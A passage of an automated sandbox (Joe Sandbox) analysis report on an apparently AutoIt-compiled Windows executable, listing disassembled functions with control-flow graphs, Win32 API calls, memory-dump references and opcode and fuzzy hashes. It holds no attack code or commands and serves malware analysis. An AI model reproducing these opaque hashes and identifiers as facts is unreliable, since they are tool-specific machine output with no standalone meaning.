                                                                                                                                                                              • Opcode Fuzzy Hash: b2b4b155bc7b3677dbe0a0c0e2b0ac8107976e076b1eb7a3dbf501af5b168be3
                                                                                                                                                                              • Instruction Fuzzy Hash: 0121C3B5900718AFDB109FA8F989BCDBBF4FB18704F00411AF615A62A0D7B44588EFA5
                                                                                                                                                                              Function 004B29C2 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 1279 4b29c2-4b29e2 1281 4b2a42-4b2a44 1279->1281 1282 4b29e4-4b29e7 1279->1282 1281->1282 1283 4b2a46 1281->1283 1284 4b29e9-4b29f0 1282->1284 1285 4b2a48 1282->1285 1286 4b2a2b-4b2a33 DefWindowProcW 1283->1286 1289 4b2aac-4b2ab4 PostQuitMessage 1284->1289 1290 4b29f6-4b29fb 1284->1290 1287 522307-522335 call 4b322e call 4cec33 1285->1287 1288 4b2a4e-4b2a51 1285->1288 1297 4b2a39-4b2a3f 1286->1297 1326 52233a-522341 1287->1326 1291 4b2a53-4b2a54 1288->1291 1292 4b2a76-4b2a9d SetTimer RegisterWindowMessageW 1288->1292 1296 4b2a72-4b2a74 1289->1296 1294 4b2a01-4b2a03 1290->1294 1295 52238f-5223a3 call 4f57fb 1290->1295 1298 4b2a5a-4b2a6d KillTimer call 4b2b94 call 4b2ac7 1291->1298 1299 5222aa-5222ad 1291->1299 1292->1296 1301 4b2a9f-4b2aaa CreatePopupMenu 1292->1301 1302 4b2a09-4b2a0e 1294->1302 1303 4b2ab6-4b2ac0 call 4b1e58 1294->1303 1295->1296 1320 5223a9 1295->1320 1296->1297 1298->1296 1305 5222e3-522302 MoveWindow 1299->1305 1306 5222af-5222b1 1299->1306 1301->1296 1309 522374-52237b 1302->1309 1310 4b2a14-4b2a19 1302->1310 1321 4b2ac5 1303->1321 1305->1296 1313 5222d2-5222de SetFocus 1306->1313 1314 5222b3-5222b6 1306->1314 1309->1286 1316 522381-52238a call 4eb31f 1309->1316 1318 4b2a1f-4b2a25 1310->1318 1319 52235f-52236f call 4f5fdb 1310->1319 1313->1296 1314->1318 1322 5222bc-5222cd call 4b322e 1314->1322 1316->1286 1318->1286 1318->1326 1319->1296 1320->1286 1321->1296 1322->1296 1326->1286 1330 522347-52235a call 4b2b94 call 4b3598 1326->1330 1330->1286
                                                                                                                                                                              APIs
                                                                                                                                                                              • DefWindowProcW.USER32(?,?,?,?), ref: 004B2A33
                                                                                                                                                                              • KillTimer.USER32(?,00000001), ref: 004B2A5D
                                                                                                                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004B2A80
                                                                                                                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004B2A8B
                                                                                                                                                                              • CreatePopupMenu.USER32 ref: 004B2A9F
                                                                                                                                                                              • PostQuitMessage.USER32(00000000), ref: 004B2AAE
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                              • String ID: TaskbarCreated
                                                                                                                                                                              • API String ID: 129472671-2362178303
                                                                                                                                                                              • Opcode ID: 6024bbb9b360a7ed71a8150d1de8010b228da195e5ac70b8463496b0a16976fe
                                                                                                                                                                              • Instruction ID: 7fc9df72a45f0e624aa9d9168a8ec06a6b876e3cd71d400decc1718435494a3f
                                                                                                                                                                              • Opcode Fuzzy Hash: 6024bbb9b360a7ed71a8150d1de8010b228da195e5ac70b8463496b0a16976fe
                                                                                                                                                                              • Instruction Fuzzy Hash: 90413130200545ABDB34AF6CBE09BFA3669F729340F00451BF515922E1DAAC5C95B77E
                                                                                                                                                                              Function 004B30A5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66windowregistryCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 004B30B0
                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 004B30BF
                                                                                                                                                                              • LoadIconW.USER32(00000063), ref: 004B30D5
                                                                                                                                                                              • LoadIconW.USER32(000000A4), ref: 004B30E7
                                                                                                                                                                              • LoadIconW.USER32(000000A2), ref: 004B30F9
                                                                                                                                                                                • Part of subcall function 004B318A: LoadImageW.USER32(004B0000,00000063,00000001,00000010,00000010,00000000), ref: 004B31AE
                                                                                                                                                                              • RegisterClassExW.USER32(?), ref: 004B3167
                                                                                                                                                                                • Part of subcall function 004B2F58: GetSysColorBrush.USER32(0000000F), ref: 004B2F8B
                                                                                                                                                                                • Part of subcall function 004B2F58: RegisterClassExW.USER32(00000030), ref: 004B2FB5
                                                                                                                                                                                • Part of subcall function 004B2F58: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004B2FC6
                                                                                                                                                                                • Part of subcall function 004B2F58: InitCommonControlsEx.COMCTL32(?), ref: 004B2FE3
                                                                                                                                                                                • Part of subcall function 004B2F58: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004B2FF3
                                                                                                                                                                                • Part of subcall function 004B2F58: LoadIconW.USER32(000000A9), ref: 004B3009
                                                                                                                                                                                • Part of subcall function 004B2F58: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 004B3018
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                              • String ID: #$0$AutoIt v3
                                                                                                                                                                              • API String ID: 423443420-4155596026
                                                                                                                                                                              • Opcode ID: efdcddb9cafff84397602e569c8e24441f4623b77279618fdf453eb8700ad1df
                                                                                                                                                                              • Instruction ID: ceff5d561b1f5500a7b4d7e3c97798467ef73b2f795052532df841ffe39be754
                                                                                                                                                                              • Opcode Fuzzy Hash: efdcddb9cafff84397602e569c8e24441f4623b77279618fdf453eb8700ad1df
                                                                                                                                                                              • Instruction Fuzzy Hash: 6C214470D10704ABCB109FADFD09A99BFF5FB54310F10412AE208A62A0D3744588FF69
                                                                                                                                                                              Function 0050B74B Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 1343 50b74b-50b7ac VariantInit call 4bca8e CoInitialize 1346 50b7b4-50b7c7 call 4cd5f6 1343->1346 1347 50b7ae CoUninitialize 1343->1347 1350 50b7d5-50b7dc 1346->1350 1351 50b7c9-50b7d0 call 4bca8e 1346->1351 1347->1346 1353 50b81b-50b85b call 4b84a6 call 4cf885 1350->1353 1354 50b7de-50b805 call 4b84a6 call 4ea857 1350->1354 1351->1350 1363 50b861-50b86e 1353->1363 1364 50b9d3-50ba17 SetErrorMode CoGetInstanceFromFile 1353->1364 1354->1353 1365 50b807-50b816 call 50c235 1354->1365 1366 50b870-50b881 call 4cd5f6 1363->1366 1367 50b8a8-50b8b6 GetRunningObjectTable 1363->1367 1368 50ba19-50ba1d 1364->1368 1369 50ba1f-50ba3a CoGetObject 1364->1369 1382 50bad0-50bae3 VariantClear 1365->1382 1385 50b8a0 1366->1385 1386 50b883-50b88d call 4bcdb4 1366->1386 1376 50b8d5-50b8e8 call 50c235 1367->1376 1377 50b8b8-50b8c9 1367->1377 1372 50ba40-50ba47 SetErrorMode 1368->1372 1373 50bab5-50bac5 call 50c235 SetErrorMode 1369->1373 1374 50ba3c 1369->1374 1381 50ba4b-50ba51 1372->1381 1392 50bac7-50bacb call 4b5cd3 1373->1392 1374->1372 1376->1392 1390 50b8cb-50b8d0 1377->1390 1391 50b8ed-50b8fc 1377->1391 1388 50ba53-50ba55 1381->1388 1389 50baa8-50baab 1381->1389 1385->1367 1386->1385 1402 50b88f-50b89e call 4bcdb4 1386->1402 1394 50ba57-50ba78 call 4eac4b 1388->1394 1395 50ba8d-50baa6 call 4fa6f6 1388->1395 1389->1373 1390->1376 1401 50b907-50b91b 1391->1401 1392->1382 1394->1395 1404 50ba7a-50ba83 1394->1404 1395->1392 1409 50b921-50b925 1401->1409 1410 50b9bb-50b9d1 1401->1410 1402->1367 1404->1395 1409->1410 1411 50b92b-50b940 1409->1411 1410->1381 1415 50b9a2-50b9ac 1411->1415 1416 50b942-50b957 1411->1416 1415->1401 1416->1415 1419 50b959-50b983 call 4eac4b 1416->1419 1423 50b994-50b99e 1419->1423 1424 50b985-50b98d 1419->1424 1423->1415 1425 50b9b1-50b9b6 1424->1425 1426 50b98f-50b990 1424->1426 1425->1410 1426->1423
                                                                                                                                                                              APIs
                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 0050B777
                                                                                                                                                                              • CoInitialize.OLE32(00000000), ref: 0050B7A4
                                                                                                                                                                              • CoUninitialize.OLE32 ref: 0050B7AE
                                                                                                                                                                              • GetRunningObjectTable.OLE32(00000000,?), ref: 0050B8AE
                                                                                                                                                                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 0050B9DB
                                                                                                                                                                              • CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002), ref: 0050BA0F
                                                                                                                                                                              • CoGetObject.OLE32(?,00000000,0053D91C,?), ref: 0050BA32
                                                                                                                                                                              • SetErrorMode.KERNEL32(00000000), ref: 0050BA45
                                                                                                                                                                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0050BAC5
                                                                                                                                                                              • VariantClear.OLEAUT32(0053D91C), ref: 0050BAD5
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2395222682-0
                                                                                                                                                                              • Opcode ID: bc76deb5d23732837ffdef638d82b0d5c43866b1df94dd15e72892a05abbd7da
                                                                                                                                                                              • Instruction ID: e06cb881069376ca385fdc696ae478b3c33a74e76331130f1e15b96e3ecc304b
                                                                                                                                                                              • Opcode Fuzzy Hash: bc76deb5d23732837ffdef638d82b0d5c43866b1df94dd15e72892a05abbd7da
                                                                                                                                                                              • Instruction Fuzzy Hash: ACC10371604305AFD700DF69C884A6ABBF9FF88348F04495DF98A9B291DB71ED05CB62
                                                                                                                                                                              Function 004DBA66 Relevance: 15.2, APIs: 10, Instructions: 219COMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 1428 4dba66-4dba93 call 4d7750 call 4d8984 call 4d7616 1435 4dba95-4dbaab call 4df630 1428->1435 1436 4dbab0-4dbab5 1428->1436 1444 4dbd05-4dbd0a call 4d7795 1435->1444 1438 4dbabb-4dbac2 1436->1438 1440 4dbaf5-4dbb04 GetStartupInfoW 1438->1440 1441 4dbac4-4dbaf3 1438->1441 1442 4dbb0a-4dbb0f 1440->1442 1443 4dbc33-4dbc39 1440->1443 1441->1438 1442->1443 1445 4dbb15-4dbb2c 1442->1445 1446 4dbc3f-4dbc50 1443->1446 1447 4dbcf7-4dbd03 call 4dbd0b 1443->1447 1450 4dbb2e-4dbb30 1445->1450 1451 4dbb33-4dbb36 1445->1451 1452 4dbc65-4dbc6b 1446->1452 1453 4dbc52-4dbc55 1446->1453 1447->1444 1450->1451 1455 4dbb39-4dbb3f 1451->1455 1457 4dbc6d-4dbc70 1452->1457 1458 4dbc72-4dbc79 1452->1458 1453->1452 1456 4dbc57-4dbc60 1453->1456 1460 4dbb61-4dbb69 1455->1460 1461 4dbb41-4dbb52 call 4d7616 1455->1461 1462 4dbcf1-4dbcf2 1456->1462 1463 4dbc7c-4dbc88 GetStdHandle 1457->1463 1458->1463 1467 4dbb6c-4dbb6e 1460->1467 1473 4dbb58-4dbb5e 1461->1473 1474 4dbbe6-4dbbed 1461->1474 1462->1443 1464 4dbccf-4dbce5 1463->1464 1465 4dbc8a-4dbc8c 1463->1465 1464->1462 1470 4dbce7-4dbcea 1464->1470 1465->1464 1468 4dbc8e-4dbc97 GetFileType 1465->1468 1467->1443 1471 4dbb74-4dbb79 1467->1471 1468->1464 1472 4dbc99-4dbca3 1468->1472 1470->1462 1475 4dbb7b-4dbb7e 1471->1475 1476 4dbbd3-4dbbe4 1471->1476 1477 4dbcad-4dbcb0 1472->1477 1478 4dbca5-4dbcab 1472->1478 1473->1460 1479 4dbbf3-4dbc01 1474->1479 1475->1476 1480 4dbb80-4dbb84 1475->1480 1476->1467 1482 4dbcbb-4dbccd InitializeCriticalSectionAndSpinCount 1477->1482 1483 4dbcb2-4dbcb6 1477->1483 1481 4dbcb8 1478->1481 1484 4dbc27-4dbc2e 1479->1484 1485 4dbc03-4dbc25 1479->1485 1480->1476 1486 4dbb86-4dbb88 1480->1486 1481->1482 1482->1462 1483->1481 1484->1455 1485->1479 1487 4dbb98-4dbbcd InitializeCriticalSectionAndSpinCount 1486->1487 1488 4dbb8a-4dbb96 GetFileType 1486->1488 1489 4dbbd0 1487->1489 1488->1487 1488->1489 1489->1476
                                                                                                                                                                              APIs
                                                                                                                                                                              • __lock.LIBCMT ref: 004DBA74
                                                                                                                                                                                • Part of subcall function 004D8984: __mtinitlocknum.LIBCMT ref: 004D8996
                                                                                                                                                                                • Part of subcall function 004D8984: EnterCriticalSection.KERNEL32(004D0127,?,004D876D,0000000D), ref: 004D89AF
                                                                                                                                                                              • __calloc_crt.LIBCMT ref: 004DBA85
                                                                                                                                                                                • Part of subcall function 004D7616: __calloc_impl.LIBCMT ref: 004D7625
                                                                                                                                                                                • Part of subcall function 004D7616: Sleep.KERNEL32(00000000,?,004D0127,?,004B125D,00000058,?,?), ref: 004D763C
                                                                                                                                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 004DBAA0
                                                                                                                                                                              • GetStartupInfoW.KERNEL32(?,00566990,00000064,004D6B14,005667D8,00000014), ref: 004DBAF9
                                                                                                                                                                              • __calloc_crt.LIBCMT ref: 004DBB44
                                                                                                                                                                              • GetFileType.KERNEL32(00000001), ref: 004DBB8B
                                                                                                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 004DBBC4
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1426640281-0
                                                                                                                                                                              • Opcode ID: 3f0b35f044e2d66b88d642cf096bd1ac7a34a28a628f33d8d0f7fc355d0d6d55
                                                                                                                                                                              • Instruction ID: a44fd74af1349cee43199316589ab66ddf802750579745519281aa80ecb535c0
                                                                                                                                                                              • Opcode Fuzzy Hash: 3f0b35f044e2d66b88d642cf096bd1ac7a34a28a628f33d8d0f7fc355d0d6d55
                                                                                                                                                                              • Instruction Fuzzy Hash: 4A81E170904305CFCB20CF68D8606AABBF0FB19724B24425FD4A6AB3D1C7389843DB99
                                                                                                                                                                              Function 005123C5 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 1490 5123c5-512426 call 4d1970 1493 512452-512456 1490->1493 1494 512428-51243b call 4bcdb4 1490->1494 1496 512458-512468 call 4bcdb4 1493->1496 1497 51249d-5124a3 1493->1497 1502 512488 1494->1502 1503 51243d-512450 call 4bcdb4 1494->1503 1512 51246b-512484 call 4bcdb4 1496->1512 1499 5124a5-5124a8 1497->1499 1500 5124b8-5124be 1497->1500 1504 5124ab-5124b0 call 4bcdb4 1499->1504 1505 5124c0 1500->1505 1506 5124c8-5124e2 call 4b84a6 call 4b3bcf 1500->1506 1508 51248b-51248f 1502->1508 1503->1512 1504->1500 1505->1506 1523 5125a1-5125a9 1506->1523 1524 5124e8-512541 call 4b84a6 call 4b3bcf call 4b84a6 call 4b3bcf call 4b84a6 call 4b3bcf 1506->1524 1513 512491-512497 1508->1513 1514 512499-51249b 1508->1514 1512->1497 1522 512486 1512->1522 1513->1504 1514->1497 1514->1500 1522->1508 1526 5125d3-512601 GetCurrentDirectoryW call 4d010a GetCurrentDirectoryW 1523->1526 1527 5125ab-5125c6 call 4b84a6 call 4b3bcf 1523->1527 1572 512543-51255e call 4b84a6 call 4b3bcf 1524->1572 1573 51256f-51259f GetSystemDirectoryW call 4d010a GetSystemDirectoryW 1524->1573 1535 512605 1526->1535 1527->1526 1543 5125c8-5125d1 call 4d18fb 1527->1543 1538 512609-51260d 1535->1538 1541 51260f-512639 call 4bca8e * 3 1538->1541 1542 51263e-51264e call 4f9a8f 1538->1542 1541->1542 1552 512650-51269b call 4fa17a call 4fa073 call 4fa102 1542->1552 1553 5126aa 1542->1553 1543->1526 1543->1542 1557 5126ac-5126bb 1552->1557 1586 51269d-5126a8 1552->1586 1553->1557 1561 5126c1-5126f1 call 4ebc90 call 4d18fb 1557->1561 1562 51274c-512768 CreateProcessW 1557->1562 1587 5126f3-5126f8 1561->1587 1588 5126fa-51270a call 4d18fb 1561->1588 1565 51276b-51277e call 4d017e * 2 1562->1565 1591 512780-5127b8 call 4fd7e4 GetLastError call 4b7ba9 call 4c2570 1565->1591 1592 5127bd-5127c9 CloseHandle 1565->1592 1572->1573 1594 512560-512569 call 4d18fb 1572->1594 1573->1535 1586->1557 1587->1587 1587->1588 1598 512713-512723 call 4d18fb 1588->1598 1599 51270c-512711 1588->1599 1607 51283e-51284f call 4f9b29 1591->1607 1596 5127f5-5127f9 1592->1596 1597 5127cb-5127f0 call 4f9d09 call 4fa37f call 512881 1592->1597 1594->1538 1594->1573 1601 512807-512811 1596->1601 1602 5127fb-512805 1596->1602 1597->1596 1618 512725-51272a 1598->1618 1619 51272c-51274a call 4d017e * 3 1598->1619 1599->1598 1599->1599 1608 512813 1601->1608 1609 512819-512838 call 4c2570 CloseHandle 1601->1609 1602->1607 1608->1609 1609->1607 1618->1618 1618->1619 1619->1565
                                                                                                                                                                              APIs
                                                                                                                                                                              • _memset.LIBCMT ref: 005123E6
                                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00512579
                                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0051259D
                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 005125DD
                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 005125FF
                                                                                                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00512760
                                                                                                                                                                              • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00512792
                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 005127C1
                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00512838
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4090791747-0
                                                                                                                                                                              • Opcode ID: 3f6e6680a5e1d0278ae6d8ebfa5ecef5b1f9e47b555666099c90d7d29f109fc9
                                                                                                                                                                              • Instruction ID: 8c318a87831f32e1d325cadeda7246de76d82e9010003c3b1d1d8f93e7715047
                                                                                                                                                                              • Opcode Fuzzy Hash: 3f6e6680a5e1d0278ae6d8ebfa5ecef5b1f9e47b555666099c90d7d29f109fc9
                                                                                                                                                                              • Instruction Fuzzy Hash: 66D1C0316043019FDB14EF25C891BAABBE5BF84314F14845EF8899B3A2DB74DC81CB66
                                                                                                                                                                              Function 0050C8B7 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 1631 50c8b7-50c8f1 1632 50c8f7-50c8fa 1631->1632 1633 50ccfb-50ccff 1631->1633 1632->1633 1635 50c900-50c903 1632->1635 1634 50cd04-50cd05 1633->1634 1636 50cd06 call 50c235 1634->1636 1635->1633 1637 50c909-50c912 call 50cff8 1635->1637 1641 50cd0b-50cd0f 1636->1641 1642 50c914-50c920 1637->1642 1643 50c925-50c92e call 4fbe14 1637->1643 1642->1636 1646 50cc61-50cc6c call 4bd2c0 1643->1646 1647 50c934-50c93a 1643->1647 1655 50cca9-50ccb4 call 4bd2c0 1646->1655 1656 50cc6e-50cc72 1646->1656 1648 50c940 1647->1648 1649 50c93c-50c93e 1647->1649 1651 50c942-50c94a 1648->1651 1649->1651 1653 50c950-50c967 call 4eabf3 1651->1653 1654 50ccec-50ccf4 1651->1654 1666 50c973-50c97f 1653->1666 1667 50c969-50c96e 1653->1667 1654->1633 1655->1654 1665 50ccb6-50ccba 1655->1665 1659 50cc74-50cc76 1656->1659 1660 50cc78 1656->1660 1663 50cc7a-50cc98 call 4cd6b4 call 4f97b6 1659->1663 1660->1663 1682 50cc99-50cca7 call 4fd7e4 1663->1682 1669 50ccc0 1665->1669 1670 50ccbc-50ccbe 1665->1670 1671 50c981-50c98d 1666->1671 1672 50c9ce-50c9f9 call 4cfa89 1666->1672 1667->1634 1676 50ccc2-50ccea call 4cd6b4 call 4f503c call 4c2570 1669->1676 1670->1676 1671->1672 1673 50c98f-50c99c call 4ea8c8 1671->1673 1683 50ca18-50ca1a 1672->1683 1684 50c9fb-50ca16 call 4cac65 1672->1684 1681 50c9a1-50c9a6 1673->1681 1676->1682 1681->1672 1687 50c9a8-50c9af 1681->1687 1682->1641 1690 50ca1d-50ca24 1683->1690 1684->1690 1694 50c9b1-50c9b8 1687->1694 1695 50c9be-50c9c5 1687->1695 1691 50ca52-50ca59 1690->1691 1692 50ca26-50ca30 1690->1692 1701 50cadf-50caec 1691->1701 1702 50ca5f-50ca66 1691->1702 1698 50ca32-50ca48 call 4ea25b 1692->1698 1694->1695 1700 50c9ba 1694->1700 1695->1672 1703 50c9c7 1695->1703 1713 50ca4a-50ca50 1698->1713 1700->1695 1704 50cafb-50cb28 VariantInit call 4d1970 1701->1704 1705 50caee-50caf8 1701->1705 1702->1701 1708 50ca68-50ca7b 1702->1708 1703->1672 1716 50cb2a-50cb2b 1704->1716 1717 50cb2d-50cb30 1704->1717 1705->1704 1711 50ca7c-50ca84 1708->1711 1714 50cad1-50cada 1711->1714 1715 50ca86-50caa3 VariantClear 1711->1715 1713->1691 1714->1711 1720 50cadc 1714->1720 1718 50caa5-50cab9 SysAllocString 1715->1718 1719 50cabc-50cacc 1715->1719 1721 50cb31-50cb43 1716->1721 1717->1721 1718->1719 1719->1714 1722 50cace 1719->1722 1720->1701 1723 50cb47-50cb4c 1721->1723 1722->1714 1724 50cb8a-50cb8c 1723->1724 1725 50cb4e-50cb52 1723->1725 1728 50cbb4-50cbd5 call 4fd7e4 call 4fa6f6 1724->1728 1729 50cb8e-50cb95 1724->1729 1726 50cba1-50cba5 1725->1726 1727 50cb54-50cb86 1725->1727 1730 50cba6-50cbaf call 50c235 1726->1730 1727->1724 1737 50cc41-50cc50 VariantClear 1728->1737 1741 50cbd7-50cbe0 1728->1741 1729->1726 1732 50cb97-50cb9f 1729->1732 1730->1737 1732->1730 1739 50cc52-50cc55 call 4f1693 1737->1739 1740 50cc5a-50cc5c 1737->1740 1739->1740 1740->1641 1743 50cbe2-50cbef 1741->1743 1744 50cbf1-50cbf8 1743->1744 1745 50cc38-50cc3f 1743->1745 1746 50cc26-50cc2a 1744->1746 1747 50cbfa-50cc0a 1744->1747 1745->1737 1745->1743 1748 50cc30 1746->1748 1749 50cc2c-50cc2e 1746->1749 1747->1745 1750 50cc0c-50cc14 1747->1750 1751 50cc32-50cc33 call 4fa6f6 1748->1751 1749->1751 1750->1746 1752 50cc16-50cc1c 1750->1752 1751->1745 1752->1746 1754 50cc1e-50cc24 1752->1754 1754->1745 1754->1746
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
